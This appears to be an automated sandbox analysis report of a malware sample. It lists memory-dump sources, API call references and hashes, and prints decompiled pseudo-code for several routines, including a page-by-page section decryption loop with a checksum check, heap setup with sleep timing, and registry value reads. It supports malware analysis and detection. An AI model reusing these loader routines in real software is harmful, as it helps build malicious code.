                                                                                                                                                                                                                        0x026f698b
                                                                                                                                                                                                                        0x026f698b
                                                                                                                                                                                                                        0x026f6991
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f6991
                                                                                                                                                                                                                        0x026f68fb
                                                                                                                                                                                                                        0x026f6900
                                                                                                                                                                                                                        0x026f6909
                                                                                                                                                                                                                        0x026f690e
                                                                                                                                                                                                                        0x026f6912
                                                                                                                                                                                                                        0x026f6939
                                                                                                                                                                                                                        0x026f6914
                                                                                                                                                                                                                        0x026f6924
                                                                                                                                                                                                                        0x026f692e
                                                                                                                                                                                                                        0x026f6930
                                                                                                                                                                                                                        0x026f6930
                                                                                                                                                                                                                        0x026f693c
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f693c
                                                                                                                                                                                                                        0x026f68ec

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • memset.NTDLL ref: 026F682A
                                                                                                                                                                                                                          • Part of subcall function 026F90A5: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,026F6852,00410025,00000005,?,00000000), ref: 026F90B6
                                                                                                                                                                                                                          • Part of subcall function 026F90A5: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 026F90D3
                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 026F6861
                                                                                                                                                                                                                        • StrCmpNIW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,026F2042), ref: 026F686C
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                                                                                                                                                                                        • String ID: Clie
                                                                                                                                                                                                                        • API String ID: 3817122888-1624203186
                                                                                                                                                                                                                        • Opcode ID: 3c019f43b251da99821470ca6f3a3c029ba6bacab6329817603d2642ecf9a99b
                                                                                                                                                                                                                        • Instruction ID: 84b94bb90af2c60d32fc824404a705aa7be21531574f3ebc94d3796141fb0ab4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c019f43b251da99821470ca6f3a3c029ba6bacab6329817603d2642ecf9a99b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77418D72508305AFDF90AFA0C984E5F7BEDEF84714F00492EBBA597210DA71D9148B96
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(80000002), ref: 026F5756
                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(026F8CCC), ref: 026F579A
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F57AE
                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 026F57BC
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                                                                        • Opcode ID: 41792694bb0b09ccb707f538eb92b8427c0dee358430c093c2c50c84c8e9690d
                                                                                                                                                                                                                        • Instruction ID: 9e5e9b4782d2b4b8f19e92e1ab3343b3f5dc0dd6ab431e6e992cf49335f92cb6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41792694bb0b09ccb707f538eb92b8427c0dee358430c093c2c50c84c8e9690d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA310A76900209EFCF54DF98D8C49AE7BB9FF48304B50882EFA06DB250D7319981CB65
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                                                                        			E02191B04(void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                                                                        				unsigned int _v16;
                                                                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                        				intOrPtr* _v36;
                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                                        				intOrPtr _t78;
                                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t78 =  *0x2194130;
                                                                                                                                                                                                                        				_t42 = E02191652(_t78,  &_v24,  &_v16);
                                                                                                                                                                                                                        				_v20 = _t42;
                                                                                                                                                                                                                        				if(_t42 == 0) {
                                                                                                                                                                                                                        					asm("sbb ebx, ebx");
                                                                                                                                                                                                                        					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                                                                                                                                                                                                        					_t79 = _t78 + _v24;
                                                                                                                                                                                                                        					_v40 = _t79;
                                                                                                                                                                                                                        					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                                                                                                                                                                                                        					_v28 = _t49;
                                                                                                                                                                                                                        					if(_t49 == 0) {
                                                                                                                                                                                                                        						_v20 = 8;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                        						if(_t61 <= 0) {
                                                                                                                                                                                                                        							_t50 =  *0x2194140;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							_t53 = _t49 - _t79;
                                                                                                                                                                                                                        							_v32 = _t53;
                                                                                                                                                                                                                        							_v36 = _t53 + _a4 + 0x21951a2;
                                                                                                                                                                                                                        							_v12 = _t79;
                                                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                                                        								asm("rol edx, cl");
                                                                                                                                                                                                                        								E02191E27(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                                                                                                                                                                                                        								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                                                                                                                                                                                                        								_v8 = _v8 + 1;
                                                                                                                                                                                                                        								_v12 = _v12 + 0x1000;
                                                                                                                                                                                                                        								 *0x2194140 = _t50;
                                                                                                                                                                                                                        								if(_v8 >= _t61) {
                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								_t53 = _v32;
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						if(_t50 != 0x59935a40) {
                                                                                                                                                                                                                        							_v20 = 0xc;
                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                        							memcpy(_v40, _v28, _v16);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						VirtualFree(_v28, 0, 0x8000); // executed
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _v20;
                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                        0x02191b0b
                                                                                                                                                                                                                        0x02191b1b
                                                                                                                                                                                                                        0x02191b20
                                                                                                                                                                                                                        0x02191b25
                                                                                                                                                                                                                        0x02191b3a
                                                                                                                                                                                                                        0x02191b41
                                                                                                                                                                                                                        0x02191b46
                                                                                                                                                                                                                        0x02191b57
                                                                                                                                                                                                                        0x02191b5a
                                                                                                                                                                                                                        0x02191b60
                                                                                                                                                                                                                        0x02191b65
                                                                                                                                                                                                                        0x02191c0f
                                                                                                                                                                                                                        0x02191b6b
                                                                                                                                                                                                                        0x02191b6b
                                                                                                                                                                                                                        0x02191b71
                                                                                                                                                                                                                        0x02191bd7
                                                                                                                                                                                                                        0x02191b73
                                                                                                                                                                                                                        0x02191b76
                                                                                                                                                                                                                        0x02191b80
                                                                                                                                                                                                                        0x02191b83
                                                                                                                                                                                                                        0x02191b86
                                                                                                                                                                                                                        0x02191b8e
                                                                                                                                                                                                                        0x02191b99
                                                                                                                                                                                                                        0x02191b9a
                                                                                                                                                                                                                        0x02191b9b
                                                                                                                                                                                                                        0x02191baa
                                                                                                                                                                                                                        0x02191bb3
                                                                                                                                                                                                                        0x02191bbd
                                                                                                                                                                                                                        0x02191bc0
                                                                                                                                                                                                                        0x02191bc3
                                                                                                                                                                                                                        0x02191bca
                                                                                                                                                                                                                        0x02191bd2
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x02191b8b
                                                                                                                                                                                                                        0x02191b8b
                                                                                                                                                                                                                        0x02191bd4
                                                                                                                                                                                                                        0x02191be1
                                                                                                                                                                                                                        0x02191bf6
                                                                                                                                                                                                                        0x02191be3
                                                                                                                                                                                                                        0x02191bec
                                                                                                                                                                                                                        0x02191bf1
                                                                                                                                                                                                                        0x02191c07
                                                                                                                                                                                                                        0x02191c07
                                                                                                                                                                                                                        0x02191c16
                                                                                                                                                                                                                        0x02191c1c

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 02191B5A
                                                                                                                                                                                                                        • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,02191F42,-00000008), ref: 02191BEC
                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02191C07
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925081715.0000000002190000.00000040.00020000.sdmp, Offset: 02190000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925087488.0000000002195000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925092020.0000000002197000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Virtual$AllocFreememcpy
                                                                                                                                                                                                                        • String ID: Nov 6 2020
                                                                                                                                                                                                                        • API String ID: 4010158826-3693430718
                                                                                                                                                                                                                        • Opcode ID: 1a2f85b2016700d5bbb656a0699e5105109790998521d31d71959f167db23e20
                                                                                                                                                                                                                        • Instruction ID: 84723011aa6281e241ac5bedfb6824d40c0697637bdd14c06c724ad72fa31d65
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a2f85b2016700d5bbb656a0699e5105109790998521d31d71959f167db23e20
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15315B71D8021AEFDF11CF98D880BEEBBB5BF08304F144169E915BB240D771AA96CB91
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 78%
                                                                                                                                                                                                                        			E026F38B1(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                        				int _t46;
                                                                                                                                                                                                                        				intOrPtr* _t47;
                                                                                                                                                                                                                        				int _t48;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t47 = __eax;
                                                                                                                                                                                                                        				_push( &_v12);
                                                                                                                                                                                                                        				_push(__eax);
                                                                                                                                                                                                                        				_t39 = 0;
                                                                                                                                                                                                                        				_t46 = 0; // executed
                                                                                                                                                                                                                        				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                        				_v8 = _t26;
                                                                                                                                                                                                                        				if(_t26 < 0) {
                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_v12 == 0) {
                                                                                                                                                                                                                        					Sleep(0xc8);
                                                                                                                                                                                                                        					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				if(_v8 >= _t39) {
                                                                                                                                                                                                                        					_t28 = _v12;
                                                                                                                                                                                                                        					if(_t28 != 0) {
                                                                                                                                                                                                                        						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                        						_v8 = _t31;
                                                                                                                                                                                                                        						if(_t31 >= 0) {
                                                                                                                                                                                                                        							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                        							if(_t46 != 0) {
                                                                                                                                                                                                                        								_t46 = _t46 + 1;
                                                                                                                                                                                                                        								_t48 = _t46 + _t46;
                                                                                                                                                                                                                        								_t39 = E026F6D10(_t48);
                                                                                                                                                                                                                        								if(_t39 == 0) {
                                                                                                                                                                                                                        									_v8 = 0x8007000e;
                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                        									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        								__imp__#6(_v16);
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        						_t32 = _v12;
                                                                                                                                                                                                                        						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					 *_a4 = _t39;
                                                                                                                                                                                                                        					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				goto L13;
                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                        0x026f38bd
                                                                                                                                                                                                                        0x026f38c1
                                                                                                                                                                                                                        0x026f38c2
                                                                                                                                                                                                                        0x026f38c3
                                                                                                                                                                                                                        0x026f38c5
                                                                                                                                                                                                                        0x026f38c7
                                                                                                                                                                                                                        0x026f38ca
                                                                                                                                                                                                                        0x026f38cf
                                                                                                                                                                                                                        0x026f3966
                                                                                                                                                                                                                        0x026f396d
                                                                                                                                                                                                                        0x026f396d
                                                                                                                                                                                                                        0x026f38d8
                                                                                                                                                                                                                        0x026f38df
                                                                                                                                                                                                                        0x026f38ef
                                                                                                                                                                                                                        0x026f38ef
                                                                                                                                                                                                                        0x026f38f5
                                                                                                                                                                                                                        0x026f38f7
                                                                                                                                                                                                                        0x026f38fc
                                                                                                                                                                                                                        0x026f3905
                                                                                                                                                                                                                        0x026f390b
                                                                                                                                                                                                                        0x026f3910
                                                                                                                                                                                                                        0x026f391b
                                                                                                                                                                                                                        0x026f391f
                                                                                                                                                                                                                        0x026f3921
                                                                                                                                                                                                                        0x026f3922
                                                                                                                                                                                                                        0x026f392b
                                                                                                                                                                                                                        0x026f392f
                                                                                                                                                                                                                        0x026f3940
                                                                                                                                                                                                                        0x026f3931
                                                                                                                                                                                                                        0x026f3936
                                                                                                                                                                                                                        0x026f393b
                                                                                                                                                                                                                        0x026f394a
                                                                                                                                                                                                                        0x026f394a
                                                                                                                                                                                                                        0x026f391f
                                                                                                                                                                                                                        0x026f3950
                                                                                                                                                                                                                        0x026f3956
                                                                                                                                                                                                                        0x026f3956
                                                                                                                                                                                                                        0x026f395f
                                                                                                                                                                                                                        0x026f3964
                                                                                                                                                                                                                        0x026f3964
                                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1198164300-0
                                                                                                                                                                                                                        • Opcode ID: fc646bfbd8e09e1820462e681c3c22b790d4c8e4f8e68d0fa66cf888cf0c6d40
                                                                                                                                                                                                                        • Instruction ID: 3b30ad502102064c145eb405a1421a40977819cd654bbe9aaf21196a900606ee
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc646bfbd8e09e1820462e681c3c22b790d4c8e4f8e68d0fa66cf888cf0c6d40
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11215C7590024AEFCF41DFA8C88499EBBB9FF49305B1085A9EE15A7300EB31EA51CF50
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F567B(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                        				void* _t5;
                                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_t16 = __edx;
                                                                                                                                                                                                                        				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                        				 *0x26fd238 = _t5;
                                                                                                                                                                                                                        				if(_t5 == 0) {
                                                                                                                                                                                                                        					_t14 = 8;
                                                                                                                                                                                                                        					return _t14;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				 *0x26fd1a8 = GetTickCount();
                                                                                                                                                                                                                        				_t7 = E026F3B0B(_a4);
                                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                                        					do {
                                                                                                                                                                                                                        						_t22 = SwitchToThread() + 8;
                                                                                                                                                                                                                        						_t10 = E026F5CDC(_a4, _t22);
                                                                                                                                                                                                                        						Sleep(0x20 + _t22 * 4); // executed
                                                                                                                                                                                                                        					} while (_t10 == 1);
                                                                                                                                                                                                                        					if(E026F6BF1(_t15) != 0) {
                                                                                                                                                                                                                        						 *0x26fd260 = 1; // executed
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					_t13 = E026F1E95(_t16); // executed
                                                                                                                                                                                                                        					return _t13;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                        0x026f567b
                                                                                                                                                                                                                        0x026f5684
                                                                                                                                                                                                                        0x026f568a
                                                                                                                                                                                                                        0x026f5691
                                                                                                                                                                                                                        0x026f5695
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f5695
                                                                                                                                                                                                                        0x026f56a2
                                                                                                                                                                                                                        0x026f56a7
                                                                                                                                                                                                                        0x026f56ae
                                                                                                                                                                                                                        0x026f56b2
                                                                                                                                                                                                                        0x026f56be
                                                                                                                                                                                                                        0x026f56c2
                                                                                                                                                                                                                        0x026f56d1
                                                                                                                                                                                                                        0x026f56d7
                                                                                                                                                                                                                        0x026f56e5
                                                                                                                                                                                                                        0x026f56e7
                                                                                                                                                                                                                        0x026f56e7
                                                                                                                                                                                                                        0x026f56f1
                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                        0x026f56f1
                                                                                                                                                                                                                        0x026f56f6

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00400000,00000000,026F220C,?), ref: 026F5684
                                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 026F5698
                                                                                                                                                                                                                        • SwitchToThread.KERNEL32(?,00000001,?), ref: 026F56B2
                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,-00000008,?,00000001,?), ref: 026F56D1
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000001.00000002.925371401.00000000026F1000.00000020.00000001.sdmp, Offset: 026F0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925367413.00000000026F0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925384883.00000000026FC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925389502.00000000026FD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                        • Associated: 00000001.00000002.925395826.00000000026FF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CountCreateHeapSleepSwitchThreadTick
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 377297877-0
                                                                                                                                                                                                                        • Opcode ID: de628b4157063a3e8b124f6be09e1c8bb3431d320fe55b4204520d70c8da7cb4
                                                                                                                                                                                                                        • Instruction ID: 9cd8e802d53560b86bea5156d81ce2d127e5907e106f8212cf3b8fee6c0a3525
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de628b4157063a3e8b124f6be09e1c8bb3431d320fe55b4204520d70c8da7cb4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AF02B31D80304ABDFD0AB74DC58B5E36E96F04395F60082AFB16C6250EB71D8A2CE69
                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                        			E026F6A7F() {
                                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                        				intOrPtr _t24;
                                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                                        				intOrPtr _t35;
                                                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                                                        				intOrPtr _t38;
                                                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                                        				void* _t51;
                                                                                                                                                                                                                        
                                                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                                                        				_t23 = E026F3A8E(0,  &_v8); // executed
                                                                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t24 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        				_t4 = _t24 + 0x26fedb0; // 0x4b39358
                                                                                                                                                                                                                        				_t5 = _t24 + 0x26fed58; // 0x4f0053
                                                                                                                                                                                                                        				_t26 = E026F46B8( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                        				_t45 = _t26;
                                                                                                                                                                                                                        				if(_t45 == 0) {
                                                                                                                                                                                                                        					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                        					_t45 = 8;
                                                                                                                                                                                                                        					if(_v12 < _t45) {
                                                                                                                                                                                                                        						_t45 = 1;
                                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                        						_t32 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        						_t11 = _t32 + 0x26feda4; // 0x4b3934c
                                                                                                                                                                                                                        						_t48 = _t11;
                                                                                                                                                                                                                        						_t12 = _t32 + 0x26fed58; // 0x4f0053
                                                                                                                                                                                                                        						_t51 = E026F241A(_t11, _t12, _t11);
                                                                                                                                                                                                                        						_t58 = _t51;
                                                                                                                                                                                                                        						if(_t51 != 0) {
                                                                                                                                                                                                                        							_t35 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							_t13 = _t35 + 0x26fedee; // 0x30314549
                                                                                                                                                                                                                        							_t37 = E026F3695(_t48, _t58, _v8, _t51, _t13, 0x14); // executed
                                                                                                                                                                                                                        							if(_t37 == 0) {
                                                                                                                                                                                                                        								_t60 =  *0x26fd25c - 6;
                                                                                                                                                                                                                        								if( *0x26fd25c <= 6) {
                                                                                                                                                                                                                        									_t42 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        									_t15 = _t42 + 0x26fec0a; // 0x52384549
                                                                                                                                                                                                                        									E026F3695(_t48, _t60, _v8, _t51, _t15, 0x13);
                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                        							_t38 =  *0x26fd2a4; // 0x243a5a8
                                                                                                                                                                                                                        							_t17 = _t38 + 0x26fede8; // 0x4b39390
                                                                                                                                                                                                                        							_t18 = _t38 + 0x26fedc0; // 0x680043
                                                                                                                                                                                                                        							_t45 = E026F407F(_v8, 0x80000001, _t51, _t18, _t17);
                                                                                                                                                                                                                        							HeapFree( *0x26fd238, 0, _t51);
                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                        					HeapFree( *0x26fd238, 0, _v16);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				_t53 = _v8;
                                                                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                                                                        					E026F3B83(_t53);
                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                        				return _t45;
                                                                                                                                                                                                                        			}


















                                                                                                                                                                                                                        0x026f6a8f
                                                                                                                                                                                                                        0x026f6a92
                                                                                                                                                                                                                        0x026f6a99
                                                                                                                                                                                                                        0x026f6a9b
                                                                                                                                                                                                                        0x026f6a9b
                                                                                                                                                                                                                        0x026f6a9e
                                                                                                                                                                                                                        0x026f6aa3
                                                                                                                                                                                                                        0x026f6aaa
                                                                                                                                                                                                                        0x026f6ab7
                                                                                                                                                                                                                        0x026f6abc
                                                                                                                                                                                                                        0x026f6ac0
                                                                                                                                                                                                                        0x026f6ace
                                                                                                                                                                                                                        0x026f6adc
                                                                                                                                                                                                                        0x026f6ae0
                                                                                                                                                                                                                        0x026f6b71
                                                                                                                                                                                                                        0x026f6b71
                                                                                                                                                                                                                        0x026f6ae6
                                                                                                                                                                                                                        0x026f6ae6
                                                                                                                                                                                                                        0x026f6aeb
                                                                                                                                                                                                                        0x026f6aeb
                                                                                                                                                                                                                        0x026f6af2
                                                                                                                                                                                                                        0x026f6afe
                                                                                                                                                                                                                        0x026f6b00
                                                                                                                                                                                                                        0x026f6b02
                                                                                                                                                                                                                        0x026f6b04
                                                                                                                                                                                                                        0x026f6b0b
                                                                                                                                                                                                                        0x026f6b16
                                                                                                                                                                                                                        0x026f6b1d
                                                                                                                                                                                                                        0x026f6b1f
                                                                                                                                                                                                                        0x026f6b26
                                                                                                                                                                                                                        0x026f6b28
                                                                                                                                                                                                                        0x026f6b2f
                                                                                                                                                                                                                        0x026f6b3a
                                                                                                                                                                                                                        0x026f6b3a
                                                                                                                                                                                                                        0x026f6b26
                                                                                                                                                                                                                        0x026f6b3f
                                                                                                                                                                                                                        0x026f6b44
                                                                                                                                                                                                                        0x026f6b4b
                                                                                                                                                                                                                        0x026f6b69
                                                                                                                                                                                                                        0x026f6b6b
                                                                                                                                                                                                                        0x026f6b6b
                                                                                                                                                                                                                        0x026f6b02
                                                                                                                                                                                                                        0x026f6b7d
                                                                                                                                                                                                                        0x026f6b7d
                                                                                                                                                                                                                        0x026f6b7f
                                                                                                                                                                                                                        0x026f6b84
                                                                                                                                                                                                                        0x026f6b86
                                                                                                                                                                                                                        0x026f6b86
                                                                                                                                                                                                                        0x026f6b91

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04B39358,00000000,?,73BCF710,00000000,73BCF730), ref: 026F6ACE
